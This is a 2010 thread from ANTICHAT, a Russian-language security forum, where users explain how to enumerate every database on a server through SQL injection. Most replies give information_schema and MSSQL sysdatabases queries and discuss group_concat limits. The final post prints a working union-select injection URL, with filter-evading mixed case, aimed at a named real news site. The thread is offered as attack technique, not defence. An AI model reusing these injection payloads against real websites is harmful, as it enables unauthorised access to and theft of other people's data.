ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

25.06.2010, 19:36
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме: 5290740
Репутация:
912
|
|
Сообщение от ZARO
ZARO said:
Наверное тупой вопрос, но подскажите как через SQL инъекцию вывести список баз данных на сервере? Ну INFORMATION_SCHEMA это ясно, а вот как узнать другие?
Код:
Code:
select schema_name from information_schema.schemata
если так понял
|
|
|

25.06.2010, 19:47
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме: 950638
Репутация:
256
|
|
Или так:
Код:
Code:
select table_schema from information_schema.tables
|
|
|

25.06.2010, 19:47
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме: 401944
Репутация:
37
|
|
Сообщение от .:[melkiy
:."]
.:[melkiy]:. said:
Код:
Code:
select schema_name from information_schema.schemata
если так понял
Спсибо! То что нужно)
|
|
|

25.06.2010, 19:52
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
Сообщение от DrAssault
DrAssault said:
Или так:
Код:
Code:
select table_schema from information_schema.tables
И что, в бд примерно 40 табл, group_concat() ограничен 512 символами.
40 табл находится в базе bla1.
Просто тупо, bla1 40 раз повторится. Не вариант.
// 2Konqi, даже так.
// manual говорит что 512.
|
|
|

25.06.2010, 19:55
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от Ctacok
Ctacok said:
И что, в бд примерно 40 табл, group_concat() ограничен 512 символами.
40 табл находится в базе bla1.
Просто тупо, bla1 40 раз повторится.
Не вариант
.
первый 16 будут information_schema
|
|
|

25.06.2010, 20:07
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 12
Провел на форуме: 52455
Репутация:
18
|
|
А если так
select concat_ws(0x3A3a,table_schema,table_name,column_na me) from information_schema.columns limit 1,1
и лимитом перебирать? Будет выводить к какой базе относится таблица и поле, так и узнаем все базы на серваке. Или я не правильно понял вопрос
|
|
|

25.06.2010, 20:13
|
|
Guest
Сообщений: n/a
Провел на форуме: 26362
Репутация:
1
|
|
Сообщение от ZARO
ZARO said:
Наверное тупой вопрос, но подскажите как через SQL инъекцию вывести список баз данных на сервере? Ну INFORMATION_SCHEMA это ясно, а вот как узнать другие?
(MSSQL)
Код:
Code:
use master
select * from sysdatabases
или
Код:
Code:
select name from master..sysdatabases
(MySQL)
Код:
Code:
SELECT CATALOG_NAME AS DataBaseName
FROM INFORMATION_SCHEMA.SCHEMATA
или
Код:
Code:
SELECT name AS DATABASENAME
FROM master.dbo.sysdatabases
|
|
|
|

25.06.2010, 20:37
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме: 111014
Репутация:
8
|
|
Сообщение от Konqi
Konqi said:
первый 16 будут information_schema
Хорошая статья про group_concat, почитай.
Код:
Code:
/thread118842.html
|
|
|

25.06.2010, 21:02
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от FlaktW
FlaktW said:
Хорошая статья про group_concat, почитай.
Код:
Code:
/thread118842.html
прости если я что то не так написал, просто я NooB в этих делах, что я не правильно сказал ?
|
|
|

25.06.2010, 22:49
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме: 472147
Репутация:
211
|
|
can'not get tables....
Код:
Code:
http://www.infoimobiliar.ro/news.php?id=-597+uNioN+seLecT+1,2,unhex%28hex%28group_concat%28table_name%29%29%29,4,5,6,7,8,9+from+information_schema.tables--
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|